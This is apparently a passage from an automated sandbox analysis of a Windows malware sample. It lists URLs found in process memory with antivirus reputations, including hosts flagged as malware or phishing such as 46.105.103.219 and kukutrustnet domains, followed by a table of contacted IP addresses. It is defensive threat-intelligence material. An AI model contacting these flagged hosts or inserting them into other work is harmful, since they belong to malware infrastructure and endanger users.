        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?c535894d=349578548true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?e7c0a656=226918236true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?7ccb59f9=1986137579true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?eaf3a57c=-2118786840true
        • Avira URL Cloud: malware
        unknown
        http://46.105.103.219/sobakavolos.gif?7e81b91=530607684true
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://aka.ms/odirmrexplorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          http://slwocfd/sobaka1.gif?564061b2=1493272264pRHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            http://slwocfd/sobaka1.gif?a5cbf448=-735340920RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
              high
              https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqsSearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmpfalse
                high
                https://aefd.nelreports.net/api/report?cat=bingaotakSearchApp.exe, 00000013.00000000.1991249729.0000024B440E7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1955687882.0000024339C6C000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    http://46.105.103.219/sobakavolos.gif?b4156853=1747636390dRHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                      high
                      http://46.105.103.219/sobakakRHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5SearchApp.exe, 00000013.00000000.1961146784.0000024340CDC000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2056369777.0000024B55A15000.00000004.00000001.00020000.00000000.sdmpfalse
                        high
                        https://outlook.office.com/owaSearchApp.exe, 00000013.00000000.2047714697.0000024B5549B000.00000004.00000001.00020000.00000000.sdmpfalse
                          high
                          http://slwocfd/sobaka1.gif?f017666e=1892850142RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://46.105.103.219/sobakavolos.gif?4c8fe82=722530962C$RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://slwocfd/sobaka1.gif?8a6244f0=-1973271312RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://wns.windows.com/Lexplorer.exe, 0000000D.00000000.1892524748.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                            high
                            http://slwocfd/sobaka1.gif?52e81f=5433375RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://outlook.live.com/owaSearchApp.exe, 00000013.00000000.1977010111.0000024B420F9000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://kukutrustnet987.info/home.gifRHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                high
                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://slwocfd/sobaka1.gif?8ffc239e=-1342936358RRHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://ntp.msn.com/web-widget?form=MSearchApp.exe, 00000013.00000000.2154000776.0000024B5BE70000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://graph.windows.net/parseSharePointUrlResponseSearchApp.exe, 00000013.00000000.2039358482.0000024B55252000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://slwocfd/sobaka1.gif?e14e2c8c=-1544911452RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://slwocfd/sobaka1.gif?7f4bf891=2088491733LRHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          high
                                          http://slwocfd/sobaka1.gif?b2218d7f=-930728452.RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            high
                                            http://slwocfd/sobaka1.gif?afe2fd9b=-1081346452VRHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                              high
                                              http://46.105.103.219/sobakavolos.gif?2e864a2=146353638cRHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://slwocfd/sobaka1.gif?8ffc239e=-1342936358RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://outlook.office.com/User.ReadWriteKSearchApp.exe, 00000013.00000000.1968354568.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                https://aefd.nelreports.net/api/report?cat=bingrmsSearchApp.exe, 00000013.00000000.1991249729.0000024B440E7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1955687882.0000024339C6C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1982087005.0000024B422E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  high
                                                  https://powerpoint.office.comxeeStartMenuExperienceHost.exe, 00000011.00000000.1920243025.000001B98144E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://outlook.com_explorer.exe, 0000000D.00000000.1892524748.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    high
                                                    http://slwocfd/sobaka1.gif?d2293919=899431162GeRHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://rafd.https://r.aSearchApp.exe, 00000013.00000000.2001152845.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://xsts.auth.xboxlive.com/svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://windows.msn.com/shellSearchApp.exe, 00000013.00000000.1955545432.0000024339C00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://46.105.103.219/sobakavolos.gif?55ce57c=359896560p$WRHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://outlook.office.com/ZSearchApp.exe, 00000013.00000000.2145703582.0000024B5AC6C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.msn.com/de-ch/play/games/garden-tales-3/cg-9mx8n3gh3k6qSearchApp.exe, 00000013.00000000.2155834634.0000024B5BF90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://slwocfd/sobaka1.gif?d53ab8af=2142251533RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://xsts.auth.xboxlive.comsvchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983552911.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1990860553.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.microexplorer.exe, 0000000D.00000000.1884699661.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1887432165.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885217454.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000012.00000000.1950585852.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://loki.delve.office.com/api/v1/configuration/cortanaSearchApp.exe, 00000013.00000000.2009862095.0000024B44895000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360zRHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://outlook.office.com/SearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://kukutrustnet777888.info/DisableTaskMgrSoftwareRHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: phishing
                                                                        unknown
                                                                        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          http://slwocfd/sobaka1.gifhttp://46.105.103.219/sobakavolos.gifKRHxJqGoGFB.exe, 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://msit.loki.delve.office.com/apiQSearchApp.exe, 00000013.00000000.1979246867.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://substrate.office.com/M365.AccessSearchApp.exe, 00000013.00000000.1968354568.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://slwocfd/sobaka1.gif?5d4ae9a2=1565190562RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://outlook.office.com/User.ReadWriteSearchApp.exe, 00000013.00000000.1962647454.0000024341100000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2078500448.0000024B567F0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2039358482.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2098176257.0000024B58760000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://slwocfd/sobaka1.gif?aba116d6=-1318608934RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/SearchApp.exe, 00000013.00000000.2026092369.0000024B54E44000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://outlook.office365.com/mail/SearchApp.exe, 00000013.00000000.2081086933.0000024B56C20000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://graph.windows.net/SearchApp.exe, 00000013.00000000.2008268339.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2039358482.0000024B55252000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://slwocfd/sobaka1.gif?850adac5=169194890RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 0000000D.00000000.1883356157.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://gcchigh.loki.office365.us/api/v1/configuration/cortanaSearchApp.exe, 00000013.00000000.2009862095.0000024B44895000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://raka.rms_noco-VKSearchApp.exe, 00000013.00000000.2001152845.0000024B4434A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://slwocfd/sobaka1.gif?e6095c35=-871188374RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://slwocfd/sobaka1.gif?d9476d1b=2093630222Te&RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.msn.com/de-ch/play/games/fish-merge-frvr/cg-9mxwbd9sw3prhttps://www.msn.com/de-ch/play/gSearchApp.exe, 00000013.00000000.2155834634.0000024B5BF90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://slwocfd/sobaka1.gif?c4094dae=-1470297908RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://loki.delve.office.com/apiSearchApp.exe, 00000013.00000000.1979246867.0000024B4218C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963261928.0000024341183000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2002312401.0000024B443C2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://slwocfd/sobaka1.gif?d2293919=899431162JeRHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      79.126.164.67
                                                                                                      unknownMacedonia
                                                                                                      16333ONNET-AS-OWNMKfalse
                                                                                                      94.156.127.59
                                                                                                      unknownBulgaria
                                                                                                      34577SKATTV-ASBGfalse
                                                                                                      190.73.34.36
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      86.100.45.216
                                                                                                      unknownLithuania
                                                                                                      39007BALTICUM-TV-ASLTfalse
                                                                                                      118.102.149.168
                                                                                                      unknownIndia
                                                                                                      38244VINAGAME-AS-VNVNGCorporationVNfalse
                                                                                                      203.98.101.59
                                                                                                      unknownIndia
                                                                                                      23772ORTELNET-ASMsOrtelCommunicationsLtdINfalse
                                                                                                      115.78.135.71
                                                                                                      unknownViet Nam
                                                                                                      7552VIETEL-AS-APViettelGroupVNfalse
                                                                                                      114.41.80.242
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                      59.9.134.51
                                                                                                      unknownKorea Republic of
                                                                                                      4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                      113.160.133.171
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      187.40.170.3
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      189.25.10.24
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      179.212.232.131
                                                                                                      unknownBrazil
                                                                                                      28573CLAROSABRfalse
                                                                                                      191.43.4.101
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      123.30.169.88
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      113.162.238.152
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      178.211.97.155
                                                                                                      unknownUkraine
                                                                                                      8788ADAMANTKyivUkraineUAfalse
                                                                                                      86.104.74.51
                                                                                                      unknownRomania
                                                                                                      50636TELE-ROM-ASstrAleeaPaciiBlB5Ap16ROfalse
                                                                                                      190.37.87.100
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      123.27.55.144
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      92.87.163.40
                                                                                                      unknownRomania
                                                                                                      9050RTDBucharestRomaniaROfalse
                                                                                                      190.206.225.183
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      190.204.201.41
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      202.164.40.66
                                                                                                      unknownIndia
                                                                                                      17917QTLTELECOM-AS-APQuadrantTeleventuresLimitedINfalse
                                                                                                      94.76.206.19
                                                                                                      unknownUnited Kingdom
                                                                                                      29550SIMPLYTRANSITGBfalse
                                                                                                      175.102.10.34
                                                                                                      unknownChina
                                                                                                      4812CHINANET-SH-APChinaTelecomGroupCNfalse
                                                                                                      186.211.10.235
                                                                                                      unknownBrazil
                                                                                                      53156PortalSATTelecomBRfalse
                                                                                                      27.106.75.127
                                                                                                      unknownIndia
                                                                                                      45194SIPL-ASSysconInfowayPvtLtdINfalse
                                                                                                      118.69.244.25
                                                                                                      unknownViet Nam
                                                                                                      18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                                                                                      186.89.27.138
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      180.218.251.35
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      24164UBBNET-AS-TWUNIONBROADBANDNETWORKTWfalse
                                                                                                      110.164.71.147
                                                                                                      unknownThailand
                                                                                                      45758TRIPLETNET-AS-APTripleTInternetTripleTBroadbandTHfalse
                                                                                                      86.124.69.204
                                                                                                      unknownRomania
                                                                                                      8708RCS-RDS73-75DrStaicoviciROfalse
                                                                                                      89.37.188.218
                                                                                                      unknownUnited Kingdom
                                                                                                      209706NOOPUpstreamAS41108DEfalse
                                                                                                      115.254.32.245
                                                                                                      unknownIndia
                                                                                                      18101RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKCfalse
                                                                                                      177.70.129.10
                                                                                                      unknownBrazil
                                                                                                      266555ISPNETTELECOMUNICACOESLTDA-EPPBRfalse
                                                                                                      41.38.34.12
                                                                                                      unknownEgypt
                                                                                                      8452TE-ASTE-ASEGfalse
                                                                                                      182.73.61.11
                                                                                                      unknownIndia
                                                                                                      9498BBIL-APBHARTIAirtelLtdINfalse
                                                                                                      190.204.170.165
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      93.114.144.199
                                                                                                      unknownSpain
                                                                                                      34977PROCONO-ASESfalse
                                                                                                      202.59.129.35
                                                                                                      unknownBangladesh
                                                                                                      38017GLOBAL-TRANSIT-AS-SILBDRouteobjectofSquareInformatiXLtfalse
                                                                                                      61.135.18.66
                                                                                                      unknownChina
                                                                                                      4808CHINA169-BJChinaUnicomBeijingProvinceNetworkCNfalse
                                                                                                      110.78.163.76
                                                                                                      unknownThailand
                                                                                                      131090CAT-IDC-4BYTENET-AS-APCATTELECOMPublicCompanyLtdCATTfalse
                                                                                                      190.36.155.238
                                                                                                      unknownVenezuela
                                                                                                      8048CANTVServiciosVenezuelaVEfalse
                                                                                                      31.211.133.88
                                                                                                      unknownBulgaria
                                                                                                      197897PETKOMBGfalse
                                                                                                      86.106.240.47
                                                                                                      unknownMoldova Republic of
                                                                                                      8926MOLDTELECOM-ASMoldtelecomAutonomousSystemMDfalse
                                                                                                      189.13.99.195
                                                                                                      unknownBrazil
                                                                                                      7738TelemarNorteLesteSABRfalse
                                                                                                      59.93.199.71
                                                                                                      unknownIndia
                                                                                                      9829BSNL-NIBNationalInternetBackboneINfalse
                                                                                                      119.189.3.27
                                                                                                      unknownChina
                                                                                                      4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                                                      202.56.221.5
                                                                                                      unknownIndia
                                                                                                      24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicesfalse
                                                                                                      190.147.184.75
                                                                                                      unknownColombia
                                                                                                      10620TelmexColombiaSACOfalse
                                                                                                      27.251.25.201
                                                                                                      unknownIndia
                                                                                                      10201DWL-AS-INDishnetWirelessLimitedBroadbandWirelessINfalse
                                                                                                      123.27.31.5
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      191.37.199.39
                                                                                                      unknownBrazil
                                                                                                      263404DIPELNETFOZBRfalse
                                                                                                      177.22.43.78
                                                                                                      unknownBrazil
                                                                                                      52981ConectaTecnologiaLTDABRfalse
                                                                                                      113.161.196.135
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      113.161.12.199
                                                                                                      unknownViet Nam
                                                                                                      45899VNPT-AS-VNVNPTCorpVNfalse
                                                                                                      187.6.136.20
                                                                                                      unknownBrazil
                                                                                                      8167BrasilTelecomSA-FilialDistritoFederalBRfalse
                                                                                                      98.126.7.202
                                                                                                      unknownUnited States
                                                                                                      35908VPLSNETUSfalse
                                                                                                      183.83.206.61
                                                                                                      unknownIndia
                                                                                                      18209BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdINfalse
                                                                                                      27.48.201.2
                                                                                                      unknownIndia
                                                                                                      23772ORTELNET-ASMsOrtelCommunicationsLtdINfalse
                                                                                                      117.196.243.174
                                                                                                      unknownIndia
                                                                                                      9829BSNL-NIBNationalInternetBackboneINfalse
                                                                                                      211.22.167.175
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                      41.186.11.53
                                                                                                      unknownRwanda
                                                                                                      36890MTNRW-ASNRWfalse
                                                                                                      218.208.102.21
                                                                                                      unknownMalaysia
                                                                                                      4788TMNET-AS-APTMNetInternetServiceProviderMYfalse
                                                                                                      59.127.110.115
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                      203.147.91.179
                                                                                                      unknownIndia
                                                                                                      45804MEGHBELA-INMEGHBELABROADBANDINfalse
                                                                                                      69.195.140.124
                                                                                                      unknownUnited States
                                                                                                      19969JOESDATACENTERUSfalse
                                                                                                      179.184.169.171
                                                                                                      unknownBrazil
                                                                                                      18881TELEFONICABRASILSABRfalse
                                                                                                      200.205.47.222
                                                                                                      unknownBrazil
                                                                                                      10429TELEFONICABRASILSABRfalse
                                                                                                      85.65.46.116
                                                                                                      unknownIsrael
                                                                                                      1680NV-ASNCELLCOMltdILfalse
                                                                                                      121.42.25.3
                                                                                                      unknownChina
                                                                                                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                      59.161.19.29
                                                                                                      unknownIndia
                                                                                                      10199TATA-ASTataCommunicationsLtdINfalse
                                                                                                      201.81.99.192
                                                                                                      unknownBrazil
                                                                                                      28573CLAROSABRfalse
                                                                                                      181.44.61.173
                                                                                                      unknownArgentina
                                                                                                      27747TelecentroSAARfalse
                                                                                                      86.106.240.116
                                                                                                      unknownMoldova Republic of
                                                                                                      8926MOLDTELECOM-ASMoldtelecomAutonomousSystemMDfalse
                                                                                                      112.78.3.138
                                                                                                      unknownViet Nam
                                                                                                      45538ODS-AS-VNOnlinedataservicesVNfalse
                                                                                                      190.147.4.186
                                                                                                      unknownColombia
                                                                                                      10620TelmexColombiaSACOfalse
                                                                                                      118.69.54.5
                                                                                                      unknownViet Nam
                                                                                                      18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                                                                                      184.44.28.10
                                                                                                      unknownUnited States
                                                                                                      5778CENTURYLINK-LEGACY-EMBARQ-RCMTUSfalse
                                                                                                      150.165.220.74
                                                                                                      unknownBrazil
                                                                                                      1916AssociacaoRedeNacionaldeEnsinoePesquisaBRfalse
                                                                                                      36.224.135.49
                                                                                                      unknownTaiwan; Republic of China (ROC)
                                                                                                      3462HINETDataCommunicationBusinessGroupTWfalse
                                                                                                      177.11.161.29
